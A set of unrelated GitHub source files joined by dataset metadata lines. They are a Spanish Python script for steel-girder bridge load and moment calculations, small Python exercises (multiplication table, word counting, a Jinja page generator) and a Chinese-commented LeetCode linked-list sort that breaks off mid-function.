(pcv/2)\n Av = params['Av'] = 2*abarrae\n S = params['S'] = (fy*dvc*Av*((np.cos(angulo1)/np.sin(angulo1))+(np.cos(alpha)/np.sin(alpha)))*np.sin(alpha))/Vs\n Avmin = params['Avmin'] = 0.083*baseviga*0.19*((fc/1000)**0.5)/(fy/1000)\n\n vuc = params['vuc'] = 0.125*fc\n Smax1 = params['Smax1'] = 0.8*dvc\n Smax2 = params['Smax2'] = 0.4*dvc\n \n\n\n\n\n # 'losa': losa(),\n # 'carpetaAsfaltica': carpeta_asfaltica(),\n # 'Nb': 3,\n # 'vigas': viga_i({'L': L}),\n # 'S': 1.69,\n # 'S_overhang': 1.56,\n # 'L': L,\n # 'baseviga': 0.4,\n # 'fy': 420000,\n # 'fc': 28000,\n # 'tipodeseccion': 'e',\n # 'factormodcarga': 1,\n # 'svigas': svigas,\n # 'bf': (svigas / 2 ) * 2,\n # 'hviga': 0.8,\n # 'elosa': 0.2,\n # 'pesoconcreto': 2.4,\n \n # 'DCviga': 0.2,\n # 'DCbordillo': 0.2,\n # 'DCbaranda': 0.2,\n # 'DW': 0.2,\n # }\n\n # superestructura['']\n # \n # mz = model.internal_forces['DC'][1].mz\n # x = np.linspace(0, L, len(mz))\n # params['MDC'] = [[x, m] for x, m in zip(x, mz)]\n # mz = model.internal_forces['DW'][1].mz\n # x = np.linspace(0, L, len(mz))\n # params['MDW'] = [[x, m] for x, m in zip(x, mz)]\n\n # parametro_rigidez_longitudinal(superestructura)\n\n # factor_distribucion_momentos_viga_interior(superestructura)\n # factor_distribucion_cortante_viga_interior(superestructura)\n # factor_distribucion_momento_viga_exterior(superestructura)\n # factor_distribucion_diseno(superestructura)\n\n # avalúo de cargas\n # avaluo_carga(superestructura)\n\n # momentos flectores\n # cargas permanentes\n # carpeta asfaltica\n # momentos_flectores_carpeta_asfaltica(superestructura, model)\n # momentos_flectores_bordillos_barandas(superestructura, model)\n # carga viva vehicular\n \n\n # combinaciones de carga\n\n return params\n\n\ndef carpeta_asfaltica(params={}):\n # γ: peso específico del asfalto, kN/m3\n # e: espesor de la carpeta asfáltica, m\n\n params['γ'] = 22 # kN/m3\n params['e'] = 0.075\n\n return params\n\ndef losa(params={}):\n # γ: peso especifico, kN/m3\n # f'c : resistencia del concreto, MPa\n # E: módulo de elasticidad, MPa\n \n # ancho: ancho de la losa, m\n # ts: espesor de la losa, m\n # haunch: distancia entre la parte inferior de la losa y la parte superior del alma de las vigas, m\n\n params['γ'] = 24 # kN/m3\n params[\"f'c\"] = 28\n params['E'] = 4800 * params[\"f'c\"] ** 0.5 * 1000\n\n params['ancho'] = 6.5\n params['ts'] = 0.22\n params['haunch'] = 0.05\n\n params['baranda'] = barandas()\n\n return params\n\ndef barandas(params={}):\n # barandas del puente\n\n # bordillo\n\n \n\n params['bordillo'] = bordillo()\n params['peso'] = 3 / 2\n\n return params\n\ndef bordillo(params={}):\n #\n ancho = params['ancho'] = 0.25\n ancho_superior = params['anchoSuperior'] = 0.2\n altura = params['altura'] = 0.3\n peso_especifico = params['γ'] = 24\n\n params['peso'] = peso_especifico * (ancho + ancho_superior) / 2 * altura\n\n return params\n \n\n\ndef viga_i(params={}):\n # IPE 600\n # L: longitud de la viga, m\n \n # γ: peso unitario, kN/m3\n # fy: resistencia del acero, MPa\n # E: módulo de elasticidad, kPa\n\n # tf: espesor de la aleta, m\n # bf: ancho de la aleta, m\n # tw: espesor del alma, m\n\n # H: altura total de la viga, m\n # D: altura libre del alma, m\n\n # ys: centroíde medido desde la parte superior de la viga, m\n # A: área, m2\n # I: inercia, m4\n\n # Dc: profundidad del alma en compresión en el rango elástico, m\n # Iyc: momento de inercia de la aleta en compresión respecto al eje del alma, m4\n # Iyt: momento de inercia de la aleta en tensión respecto al eje del alma, m4\n\n # peso: peso de la sección transversal de la viga, kN/m\n\n # λrw: relación de esbeltez límite para un alma no compacta, -\n\n L = params['L']\n\n peso_unitario = params['γ'] = 78.5 # kN/m3 \n fy = params['fy'] = 420\n E = params['E'] = 200000000\n\n tf = params['tf'] = 0.019\n bf = params['bf'] = 0.22\n tw = params['tw'] = 0.012\n\n H = params['H'] = 0.6\n D = params['D'] = 0.514\n\n ys = params['ys'] = 0.3\n area = params['A'] = 0.015600\n params['I'] = 0.000921\n\n Dc = params['Dc'] = ys - tf\n Iyc = params['Iyc'] = tf * bf ** 4 / 12\n Iyt = params['Iyt'] = tf * bf ** 4 / 12\n\n params['peso'] = peso_unitario * area\n\n\n λrw = params['λrw'] = 5.7 * (E / fy) ** 0.5\n\n # check\n check = {}\n\n check['0.033L=D/6'] = bf >= D / 6\n check['tf>=1.1tw'] = tf >= 1.1*tw\n check['0.1<=Iyc/Iyt<=10'] = 0.1 <= Iyc / Iyt and Iyc / Iyt <= 10\n check['D/tw<150'] = D / tw < 150\n check['bfc>=L/85'] = bf >= L / 85\n check['2Dc/tw<=λrw'] = 2*Dc / tw <= λrw\n\n params['check'] = check\n\n return params\n\n\ndef parametro_rigidez_longitudinal(superestructura):\n # longitudinal stifness parameter\n losa = superestructura['losa']\n viga = superestructura['vigas']\n\n # calcular el parámetro de rigidez longitudinal\n Kg = {}\n\n n = Kg['n'] = viga['E'] / losa['E']\n I = Kg['I'] = viga['I']\n A = Kg['A'] = viga['A']\n eg = Kg['eg'] = losa['ts'] / 2 + (losa['haunch'] - viga['tf']) + viga['ys']\n\n Kg['Kg'] = n * (I + A * eg ** 2)\n\n superestructura['parametroRigidezLongitudinal'] = Kg\n\n return Kg\n\n\ndef factor_distribucion_momentos_viga_interior(superestructura):\n # g_int_moment_1: distribución de la carga viva por linea para momento en vigas interiores, -\n\n factor_distribucion = {}\n losa = superestructura['losa']\n\n Nb = superestructura['Nb']\n S = superestructura['S']\n L = superestructura['L']\n Kg = superestructura['parametroRigidezLongitudinal']['Kg']\n ts = losa['ts']\n\n # verificar la aplicabilidad de la ecuación\n check = {}\n\n check['1.1<=S<=4.9'] = 1.1 < S < 4.9\n check['0.11<=ts<=0.3'] = 0.11 < ts < 0.3\n check['6<=L<=73'] = 6 < L < 73\n check['Nb==3'] = Nb == 3\n check['Nb>=4'] = Nb >= 4\n check['0.0041623<=Kg<=2.9136'] = 0.0041623 <= Kg <= 2.9136\n\n factor_distribucion['check'] = check\n\n if (check['1.1<=S<=4.9'] and\n check['0.11<=ts<=0.3'] and\n check['6<=L<=73'] and\n check['0.0041623<=Kg<=2.9136'] and\n check['Nb==3'] or check['Nb>=4']):\n\n eq = {}\n\n g_int_moment_1 = eq['g_int_moment_1'] = 0.06 + (S / 4.3)**0.4 * (S / L)**0.3 * (Kg / (L * ts ** 3))**0.1\n g_int_moment_2 = eq['g_int_moment_2'] = 0.075 + (S / 2.9)**0.6 * (S / L)**0.2 * (Kg / (L * ts ** 3))**0.1\n eq['g_int_moment'] = max(g_int_moment_1, g_int_moment_2)\n\n factor_distribucion['ecuacion'] = eq\n\n if check['Nb==3']:\n regla_palanca = {}\n\n separacion_ruedas = camion_CC14['separacion_ruedas']\n separacion_borde = camion_CC14['separacion_borde']\n \n # un carril cargado\n m = factor_presencia_multiple[1]\n g_int_moment_1 = regla_palanca['g_int_moment_1'] = m * (2*S - separacion_ruedas) / (2*S)\n\n # dos carriles cargados\n m = factor_presencia_multiple[2]\n g_int_moment_2 = regla_palanca['g_int_moment_2'] = 2 * m * (2*S - 2*separacion_borde - separacion_ruedas) / (2*S)\n\n regla_palanca['g_int_moment'] = max(g_int_moment_1, g_int_moment_2)\n\n factor_distribucion['reglaPalanca'] = regla_palanca\n\n factor_distribucion['g_int_moment'] = min(factor_distribucion['ecuacion']['g_int_moment'], factor_distribucion['reglaPalanca']['g_int_moment'])\n\n superestructura['factorDistribucion'] = factor_distribucion\n\ndef factor_distribucion_cortante_viga_interior(superestructura):\n factor_distribucion = {}\n\n Nb = superestructura['Nb']\n S = superestructura['S']\n\n # verificar la aplicabilidad de la ecuación\n check = {}\n check['Nb==3'] = Nb == 3\n factor_distribucion['check'] = check\n\n if check['Nb==3']:\n separacion_ruedas = camion_CC14['separacion_ruedas']\n separacion_borde = camion_CC14['separacion_borde']\n \n # un carril cargado\n m = factor_presencia_multiple[1]\n g_int_moment_1 = factor_distribucion['g_int_1'] = m * (2*S - separacion_ruedas) / (2*S)\n\n # dos carriles cargados\n m = factor_presencia_multiple[2]\n g_int_moment_2 = factor_distribucion['g_int_2'] = 2 * m * (2*S - 2*separacion_borde - separacion_ruedas) / (2*S)\n\n factor_distribucion['g_int'] = max(g_int_moment_1, g_int_moment_2)\n\n superestructura['factorDistribucionCortanteVigaInterior'] = factor_distribucion\n\ndef factor_distribucion_momento_viga_exterior(superestructura):\n # factor de distrubción de momento flector en la viga exterior\n factor_distribucion = {}\n\n Nb = superestructura['Nb']\n S = superestructura['S']\n S_overhang = superestructura['S_overhang']\n ancho_bordillo = superestructura['losa']['baranda']['bordillo']['ancho']\n d_e = factor_distribucion['d_e'] = S_overhang - ancho_bordillo\n\n # verificar la aplicabilidad de la ecuación\n check = {}\n\n check['Nb==3'] = Nb == 3\n check['-0.3<=de<=1.7'] = -0.3 <= d_e <= 1.7\n\n factor_distribucion['check'] = check\n\n separacion_ruedas = camion_CC14['separacion_ruedas']\n separacion_borde = camion_CC14['separacion_borde']\n\n if check['-0.3<=de<=1.7']:\n eq = {}\n\n # un carril cargado\n m = factor_presencia_multiple[1]\n mg_1 = eq['mg_1'] = m * (2*(ancho_bordillo + separacion_borde - S_overhang) + separacion_ruedas) / (2*S)\n\n # dos carriles cargados\n mg_int = superestructura['factorDistribucion']['g_int_moment']\n e = 0.77 + d_e/ 2.8\n mg_2 = eq['mg_2'] = e * mg_int \n\n factor_distribucion['e'] = e\n factor_distribucion['mg_int'] = mg_int\n eq['mg'] = max(mg_1, mg_2)\n\n\n factor_distribucion['ecuacion'] = eq\n\n if check['Nb==3']:\n # regla de la palanca\n regla_palanca = {}\n\n # un carril cargado\n mg_ext_momento_1 = regla_palanca['mg_Me_1C'] = mg_1\n\n # dos carriles cargados\n m = factor_presencia_multiple[2]\n mg_ext_momento_2 = regla_palanca['mg_Me_2C'] = 2 * m * (3 * (S_overhang + S) - 4*separacion_borde - 3*ancho_bordillo - 2*separacion_ruedas) / (2*S)\n\n regla_palanca['mg_Me'] = max(mg_ext_momento_1, mg_ext_momento_2)\n\n factor_distribucion['reglaPalanca'] = regla_palanca\n\n factor_distribucion['mg_Me'] = min(factor_distribucion['ecuacion']['mg'], factor_distribucion['reglaPalanca']['mg_Me'])\n\n superestructura['factorDistribucionMomentoVigasExteriores'] = factor_distribucion\n\ndef factor_distribucion_diseno(superestructura):\n factor_distribucion_viga_interior = superestructura['factorDistribucion']['g_int_moment']\n factor_distribucion_viga_exterior = superestructura['factorDistribucionMomentoVigasExteriores']['mg_Me']\n\n superestructura['factorDistribucionDiseno'] = max(factor_distribucion_viga_interior, factor_distribucion_viga_exterior)\n\ndef avaluo_carga(superestructura):\n #\n avaluo_carga = {}\n\n # carga muerta\n carga_muerta = avaluo_carga['cargaMuerta'] = {}\n # losa\n espesor_losa = superestructura['losa']['ts']\n peso_especifico = superestructura['losa']['γ']\n ancho_aferente = superestructura['S']\n \n losa = carga_muerta['losa'] = peso_especifico * espesor_losa * ancho_aferente\n # viga\n viga = carga_muerta['viga'] = superestructura['vigas']['peso']\n\n # personal y equipos\n personalEquipos = carga_muerta['personalEquipos'] = 0.75 # kN/m\n\n # total\n carga_muerta['total'] = losa + viga + personalEquipos\n\n # sobreimpuesta\n carga_sobreimpuesta = avaluo_carga['cargaSobreimpuesta'] = {}\n # carpeta asfaltica\n no_vigas = superestructura['Nb']\n peso_especifico = superestructura['carpetaAsfaltica']['γ']\n espesor = superestructura['carpetaAsfaltica']['e']\n ancho_losa = superestructura['losa']['ancho']\n ancho_bordillo = superestructura['losa']['baranda']['bordillo']['ancho']\n\n carpetaAsfaltica = carga_sobreimpuesta['carpetaAsfaltica'] = peso_especifico * espesor * (ancho_losa - 2 * ancho_bordillo) / no_vigas\n # bordillo + baranda\n peso_bordillo = superestructura['losa']['baranda']['bordillo']['peso']\n peso_baranda = superestructura['losa']['baranda']['peso']\n\n bordilloBaranda = carga_sobreimpuesta['bordilloBaranda'] = 2 * (peso_bordillo + peso_baranda) / no_vigas\n # \n\n\n # total\n # carga_sobreimpuesta['total'] = carpetaAsfaltica + bordilloBaranda\n\n superestructura['avaluoCarga'] = avaluo_carga\n\n return avaluo_carga\n\n\ndef create_model(superestructura):\n # pyFEM model\n L = superestructura['L']\n Ec = superestructura['Ec']\n Iz = superestructura['I']\n\n model = Structure(uy=True, rz=True)\n\n # add material\n model.add_material(1, E=Ec)\n\n # add section\n model.add_section(1, Iz=Iz)\n\n # add joints\n model.add_joint(1, x=0)\n model.add_joint(2, x=L)\n\n # add frame\n model.add_frame(1, 1, 2, 1, 1)\n\n # add supports\n model.add_support(1, uy=True)\n model.add_support(2, uy=True)\n\n model.set_flags_active_joint_displacements()\n model.set_indexes()\n model.set_stiffness_matrix_modified_by_supports()\n\n return model\n\ndef plot(x, y, name, title, ylabel, no_ticks=2, invert_yaxis=False):\n # loadPattern = model.load_patterns['MDC']\n # mz = model.internal_forces[loadPattern][frame].mz\n\n fig, ax = plt.subplots()\n\n ax.plot(x, y, 'r')\n ax.set_title(title) # 'Momento flector'\n ax.set_xlim(min(x), max(x))\n # ax.set_ylim(ymax=0)\n\n if invert_yaxis: ax.invert_yaxis()\n\n ax.set_xlabel('m')\n ax.set_ylabel(ylabel) # 'kN m'\n\n ax.set_xticks(x[::no_ticks])\n ax.set_yticks(list(set(np.round_(y[::no_ticks], 3))))\n ax.grid(True)\n\n fig.savefig(f'{name}.png')\n\ndef momentos_flectores_cargas_estructura(params, model):\n carga_estructura = params['DCest'] # superestructura['avaluoCarga']['cargaMuerta']['total']\n\n frame = model.frames[1]\n length = frame.get_length()\n loadPattern = model.add_load_pattern(\"cargaPermanenteest\")\n loadPattern.add_distributed_load(frame.name, fy=-carga_estructura)\n\n model.solve_load_pattern(loadPattern.name)\n\n mz = frame.get_internal_forces(loadPattern.name, 20)['mz'] # model.internal_forces[loadPattern.name][frame.name].mz\n x = np.linspace(0, length, len(mz))\n\n\n plot(x, mz, 'Mdnc', 'Momentos flectores', 'kN m')\n\n x = x[::2]\n mz = mz[::2]\n params['Mdnc'] = [[x, m] for x, m in zip(x, mz)]\n\ndef fuerzas_internas_cargas_permanentes(params, model):\n carga_permanente = params['DCper'] # superestructura['avaluoCarga']['cargaMuerta']['total']\n\n frame = model.frames[1]\n length = frame.get_length()\n loadPattern = model.add_load_pattern(\"cargaPermanente\")\n loadPattern.add_distributed_load(frame.name, fy=-carga_permanente)\n\n model.solve_load_pattern(loadPattern.name)\n\n fy = frame.get_internal_forces(loadPattern.name, 40)['fy']\n mz = frame.get_internal_forces(loadPattern.name, 40)['mz'] # model.internal_forces[loadPattern.name][frame.name].mz\n x = np.linspace(0, length, len(mz))\n\n plot(x, fy, 'VDC', 'Fuerza cortante', 'kN', no_ticks=4)\n plot(x, mz, 'MDC', 'Momentos flectores', 'kN m', invert_yaxis=True, no_ticks=4)\n\n x = x[::4]\n fy = fy[::4]\n mz = mz[::4]\n\n params['VDC'] = [[x, v] for x, v in zip(x, fy)]\n params['MDC'] = [[x, m] for x, m in zip(x, mz)]\n\n params['VDCmax'] = max(fy)\n\n return params\n\ndef momentos_flectores_carpeta_asfaltica(superestructura, model):\n carga_carpeta = superestructura['avaluoCarga']['cargaSobreimpuesta']['carpetaAsfaltica']\n\n frame = model.frames[1]\n length = frame.get_length()\n\n loadPattern = model.add_load_pattern('carpetaAsfaltica')\n loadPattern.add_distributed_load(frame, fy=-carga_carpeta)\n\n model.solve()\n\n mz = model.internal_forces[loadPattern][frame].mz\n n = len(mz)\n\n superestructura['momentosFlectoresCarpetaAsfaltica'] = [[i / (n - 1) * length, m] for i, m in enumerate(mz)]\n\n\ndef momentos_flectores_bordillos_barandas(superestructura, model):\n carga_bordillosBarandas = superestructura['avaluoCarga']['cargaSobreimpuesta']['bordilloBaranda']\n\n frame = model.frames[1]\n length = frame.get_length()\n\n loadPattern = model.add_load_pattern('cargaBordillosBarandas')\n loadPattern.add_distributed_load(frame, fy=-carga_bordillosBarandas)\n\n model.solve()\n\n mz = model.internal_forces[loadPattern][frame].mz\n n = len(mz)\n\n superestructura['momentosFlectoresBordillosBarandas'] = [[i / (n - 1) * length, m] for i, m in enumerate(mz)]\n\n\ndef momentos_flectores_carga_viva_vehicular(params, model):\n # viga\n frame = model.frames[1]\n length = frame.get_length()\n\n # camion\n x_ejes_camion = np.array([0] + camion_CC14['separacion_ejes'])\n for i in range(len(x_ejes_camion)):\n for j in range(i+1, len(x_ejes_camion)):\n x_ejes_camion[j] += x_ejes_camion[i]\n length_camion = x_ejes_camion[-1]\n peso_ejes_camion = camion_CC14['peso_ejes']\n \n # tandem\n x_ejes_tandem = np.array([0] + tandem_CC14['separacion_ejes'])\n for i in range(len(x_ejes_tandem)):\n for j in range(i+1, len(x_ejes_tandem)):\n x_ejes_tandem[j] += x_ejes_tandem[i]\n \n length_tandem = x_ejes_tandem[-1]\n peso_ejes_tandem = tandem_CC14['peso_ejes']\n\n # casos de carga\n casos_carga_camion_CC14 = []\n n = 401 # NUMERO PARADAS CAMION\n vehiculos = ['camion', 'tandem']\n length_vehiculos = [length_camion, length_tandem]\n x_ejes_vehiculos = [x_ejes_camion, x_ejes_tandem]\n peso_ejes_vehiculos = [peso_ejes_camion, peso_ejes_tandem]\n\n for vehiculo, length_vehiculo, x_ejes, peso_ejes in zip(vehiculos, length_vehiculos, x_ejes_vehiculos, peso_ejes_vehiculos):\n for i in range(n):\n x = (i / (n - 1)) * (length + length_vehiculo)\n\n loadPattern = model.add_load_pattern(f'{vehiculo}: {x:.3f} m')\n\n for j, xi in enumerate(x - x_ejes):\n if 0 < xi < length:\n loadPattern.add_point_load_at_frame(frame.name, fy=(-peso_ejes[j], xi / length))\n\n casos_carga_camion_CC14.append(loadPattern.name)\n\n x = (n - 1 - i) / (n - 1) * (length + length_vehiculo) - length_vehiculo\n\n loadPattern = model.add_load_pattern(f'{vehiculo}: -{x:.3f} m')\n\n for j, xi in enumerate(x + x_ejes):\n if 0 < xi < length:\n loadPattern.add_point_load_at_frame(frame.name, fy=(-peso_ejes[j], xi / length))\n\n casos_carga_camion_CC14.append(loadPattern.name)\n\n # carril\n w = -camion_CC14['carga_carril']\n loadPattern = model.add_load_pattern('carril')\n loadPattern.add_distributed_load(frame.name, fy=w)\n\n model.solve()\n\n n = 401 # cantidad de valores por elemento por defecto\n cortantes = {'{:.3f}'.format(i / (n - 1) * length): [] for i in range(n)}\n momentos = {'{:.3f}'.format(i / (n - 1) * length): [] for i in range(n)}\n\n for load_pattern in casos_carga_camion_CC14:\n fy = frame.get_internal_forces(load_pattern, n-1)['fy']\n mz = frame.get_internal_forces(load_pattern, n-1)['mz']\n\n for i in range(n):\n cortantes['{:.3f}'.format(i / (n - 1) * length)].append(fy[i])\n momentos['{:.3f}'.format(i / (n - 1) * length)].append(mz[i])\n\n cortantes_maximos = []\n cortantes_minimos = []\n \n momentos_maximos = []\n for i, (v, m) in enumerate(zip(cortantes.values(), momentos.values())):\n cortantes_maximos.append([i / (n - 1) * length, max(v)])\n cortantes_minimos.append([i / (n - 1) * length, min(v)])\n momentos_maximos.append([i / (n - 1) * length, max(m)])\n\n loadPattern = model.load_patterns['carril']\n cortantes_carril = [[(i / (n - 1)) * length, v] for i, v in enumerate(frame.get_internal_forces(loadPattern.name, n-1)['fy'])]\n momentos_carril = [[(i / (n - 1)) * length, m] for i, m in enumerate(frame.get_internal_forces(loadPattern.name, n-1)['mz'])]\n\n cortantes_max_carga_vehicular = []\n cortantes_min_carga_vehicular = []\n momentos_carga_vehicular = []\n # factor_distribucion = params['factorDistribucionDiseno']\n for i, (v_min_camion, v_max_camion, v_carril, m_camion, m_carril) in enumerate(zip(cortantes_minimos, cortantes_maximos, cortantes_carril, momentos_maximos, momentos_carril)):\n x = m_camion[0]\n cortantes_max_carga_vehicular.append([x, 1.33 * v_max_camion[1] + v_carril[1]])\n cortantes_min_carga_vehicular.append([x, 1.33 * v_min_camion[1] + v_carril[1]])\n momentos_carga_vehicular.append([x, 1.33 * m_camion[1] + m_carril[1]]) # factor_distribucion * ()\n\n plot([x_m[0] for x_m in momentos_carga_vehicular], [x_m[1] for x_m in momentos_carga_vehicular], 'MLL', 'Momentos flectores', 'kN m', 40, True)\n\n plot([x_v[0] for x_v in cortantes_max_carga_vehicular], [x_v[1] for x_v in cortantes_max_carga_vehicular], 'VLL', 'Fuerza cortante', 'kN', 80)\n\n plot([x_v[0] for x_v in cortantes_min_carga_vehicular], [x_v[1] for x_v in cortantes_min_carga_vehicular], 'VLLmin', 'Fuerza cortante', 'kN', 80)\n \n params['MLV'] = momentos_maximos[::40]\n params['MLC'] = momentos_carril[::40]\n params['MLL'] = momentos_carga_vehicular[::40]\n\n params['VLV'] = cortantes_maximos[::40]\n params['VLC'] = cortantes_carril[::40]\n params['VLL_max'] = cortantes_max_carga_vehicular[::40]\n params['VLL_min'] = cortantes_min_carga_vehicular[::40]\n\n params['MLVmax'] = max([m[1] for m in momentos_maximos])\n params['MLCmax'] = max([m[1] for m in momentos_carril])\n params['MLLmax'] = max([m[1] for m in momentos_carga_vehicular])\n\n params['VLVmax'] = max([v[1] for v in cortantes_maximos])\n params['VLCmax'] = max([v[1] for v in cortantes_carril])\n params['VLLmax'] = max([v[1] for v in cortantes_max_carga_vehicular])\n\n return params\n \n\ndef combinaciones_carga(params, model):\n params['combinacionesCarga'] = {}\n\n length = params['L']\n n = 11\n\n m_carga_permanente = params['MDC']\n m_carga_vehicular = params['MLL']\n cargas = [m_carga_permanente, m_carga_vehicular]\n fd1 = params['mg1i']\n fd2 = params['mg2i']\n fd3 = params['mg1e']\n fd4 = params['mg2e']\n\n # estado límite de resistencia última\n mu = []\n for i, (carga_permanente, carga_vehicular) in enumerate(zip(*cargas)):\n mu.append([(i / (n - 1) * length), 1.25 * carga_permanente[1] + max(fd1,fd3) * 1.75 * carga_vehicular[1]])\n\n params['combinacionesCarga']['resistenciaUltima'] = mu\n\n # del mu\n\n # estado límite de resistencia IV\n # mu = []\n # for x, m in m_carga_permanente:\n # mu.append([x, 1.5 * m])\n\n # superestructura['combinacionesCarga']['resistenciaIV'] = mu\n\n # estado límite servicio\n mu = []\n for i, (carga_permanente, carga_vehicular) in enumerate(zip(*cargas)):\n mu.append([(i / (n - 1) * length), 1 * carga_permanente[1] + max(fd1, fd3) * 1 * carga_vehicular[1]])\n\n params['combinacionesCarga']['servicio'] = mu\n \n # print(mu)\n\ndef combinaciones_cargav(params, model):\n params['combinacionesCargav'] = {}\n\n length = params['L']\n n = 11\n\n m_carga_permanentev = params['VDC']\n m_carga_vehicularv = params['VLL_max']\n cargasv = [m_carga_permanentev, m_carga_vehicularv]\n fd1 = params['mg1i']\n fd3 = params['mg1e']\n\n #print(m_carga_permanentev)\n #print(m_carga_vehicularv)\n\n # estado límite de resistencia última\n vu = []\n for i, (carga_permanentev, carga_vehicularv) in enumerate(zip(*cargasv)):\n vu.append([(i / (n - 1) * length), 1.25 * carga_permanentev[1] + max(fd1, fd3) * 1.75 * carga_vehicularv[1]])\n\n params['combinacionesCargav']['resistenciaUltimav'] = vu\n\n # estado límite de resistencia IV\n # vu = []\n # for x, m in m_carga_permanentev:\n # vu.append([x, 1.5 * m])\n\n # superestructura['combinacionesCarga']['resistenciaIV'] = vu\n\n # estado límite servicio\n vu = []\n for i, (carga_permanentev, carga_vehicularv) in enumerate(zip(*cargasv)):\n vu.append([(i / (n - 1) * length), 1 * carga_permanentev[1] + max(fd1, fd3) * 1 * carga_vehicularv[1]])\n\n params['combinacionesCargav']['servicio'] = vu\n \n #print(mu) \n\nif __name__ == '__main__':\n superestructura = superestructura()\n # pp.pprint(superestructura)\n\n # doc template\n doc = DocxTemplate('template.docx')\n doc.render(superestructura)\n doc.save('output.docx')\n print('todo ok')\n","repo_name":"rvcristiand/pyLLDFs","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":36790,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"43684263771","text":"print('=§='*13)\nwhile True:\n n = int(input('Digite um número para ver sua tábuada.'))\n if n < 0:\n break\n for c in range(1, 11):\n print(f'{n} x {c:^2} = {n * c}')\n c += 1\n print('=§='*13)\nprint('Fim do programa')\n","repo_name":"DonovanTarsis/Aprendizagem-Python","sub_path":"PythonExercicios/ex067.py","file_name":"ex067.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"71269876574","text":"#!/usr/bin/env python3\n\nimport jinja2\nfrom datetime import datetime\nimport metalmaps\nfrom mapcollection import mapCollection\n\n\nversion = metalmaps.__version__\ndate = datetime.today().strftime(\"%Y-%m-%d\")\n\n\nif __name__ == \"__main__\":\n\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(\".\"))\n template = env.get_template(\"./metalmaps.html.jinja\")\n\n print(\n template.render(\n cmaps=mapCollection,\n suffixes=[\"\", \"_r\"],\n version=version,\n date=date,\n )\n )\n","repo_name":"mladenivkovic/mladenivkovic.github.io","sub_path":"metalmaps/generate_html.py","file_name":"generate_html.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31679767632","text":"import re\r\nimport sys\r\nimport nltk\r\nimport os\r\nfrom collections import Counter\r\nimport pprint\r\n\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\n\r\ndef word_count(filename, lemmatized = False):\r\n try:\r\n file = open(filename, \"rb\")\r\n text = file.read()\r\n file.close()\r\n except:\r\n return \r\n\r\n # Ignore hypen or apostrophe? What if apostrophe used as quotation marks?\r\n word_array = re.split('[^\\w\\-\\']', text.lower())\r\n\r\n if lemmatized:\r\n lemma = nltk.wordnet.WordNetLemmatizer()\r\n word_array = [lemma.lemmatize(a, pos = 'v') if lemma.lemmatize(a, pos = 'v') != a else lemma.lemmatize(a) for a in word_array]\r\n\r\n # Is this efficient?\r\n word_dict = {a: word_array.count(a) for a in word_array if a not in ['', '-','\\'']}\r\n\r\n return word_dict\r\n\r\ndef parseTXT(file_name):\r\n if not os.path.exists(file_name): return \"File not found.\"\r\n txt_str = open(file_name, 'r').read()\r\n clean_txt = re.sub(r'[^\\w\\'\\-]',' ',txt_str).lower().split(' ')\r\n return {a:clean_txt.count(a) for a in set(clean_txt) - {''}}\r\n\r\ndef parseBIGtxt(file_name):\r\n if not os.path.exists(file_name): return \"File not found.\"\r\n result_dict = {}\r\n with open(file_name, 'r') as txt_file:\r\n for line in txt_file:\r\n clean_line = re.sub(r'[^\\w\\'\\-]',' ',line).lower().split(' ')\r\n for word in clean_line: \r\n if word in result_dict:\r\n result_dict[word] += 1\r\n else:\r\n result_dict[word] = 1\r\n del result_dict['']\r\n return result_dict\r\n\r\ndef read_file(file_name):\r\n open_file = open(file_name, 'r')\r\n word_list =[]\r\n contents = open_file.readlines()\r\n for i in range(len(contents)):\r\n word_list.extend(contents[i].split()) \r\n open_file.close()\r\n tuples_list = [(word, len(word)) for word in word_list]\r\n return tuples_list\r\n\r\npattern = re.compile(\"[^\\w'-]|_\")\r\nwith open(sys.argv[1], 'r') as content_file:\r\n content = content_file.read().strip().lower()\r\n stripped_content = pattern.sub(' ', content)\r\n arr = stripped_content.split()\r\n counter = Counter()\r\n for word in arr:\r\n counter[word] += 1\r\n\r\n pprint.pprint(counter)\r\n","repo_name":"elysia-oh/Exercises","sub_path":"WordCount.py","file_name":"WordCount.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20676943940","text":"# 给你链表的头结点 head ,请将其按 升序 排列并返回 排序后的链表 。 \n# \n# 进阶: \n# \n# \n# 你可以在 O(n log n) 时间复杂度和常数级空间复杂度下,对链表进行排序吗? \n# \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:head = [4,2,1,3]\n# 输出:[1,2,3,4]\n# \n# \n# 示例 2: \n# \n# \n# 输入:head = [-1,5,3,4,0]\n# 输出:[-1,0,3,4,5]\n# \n# \n# 示例 3: \n# \n# \n# 输入:head = []\n# 输出:[]\n# \n# \n# \n# \n# 提示: \n# \n# \n# 链表中节点的数目在范围 [0, 5 * 104] 内 \n# -105 <= Node.val <= 105 \n# \n# Related Topics 排序 链表\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def sortList(self, head: ListNode) -> ListNode:\n \"\"\"\n 归并排序 时间复杂度O(NlogN) 空间复杂度O(1)\n 分别两个间、四个间...比较,然后合并\n \"\"\"\n if not head or not head.next:\n return head\n cur, length = head, 0\n while cur:\n cur = cur.next\n length += 1\n # 哨兵结点\n sen = ListNode(0)\n sen.next = head\n # 每次合并的规模\n intv = 1\n while intv < length:\n merge_point, cur = sen, sen.next\n # 定位此次要合并的结点h1\n while cur:\n h1, intv_count = cur, intv\n # 判断h1长度是否足够此次合并,是否存在h2\n while intv_count and cur:\n cur = cur.next\n intv_count -= 1\n # 链表结束,没有h2\n if intv_count:\n break\n h2, intv_count = cur, intv\n while intv_count and cur:\n cur = cur.next\n intv_count -= 1\n # 计算h1长度,h2长度\n len1, len2 = intv, intv - intv_count\n # 合并\n while len1 and len2:\n if h1.val < h2.val:\n # merge_point是合并好的链表的最后一个结点\n # 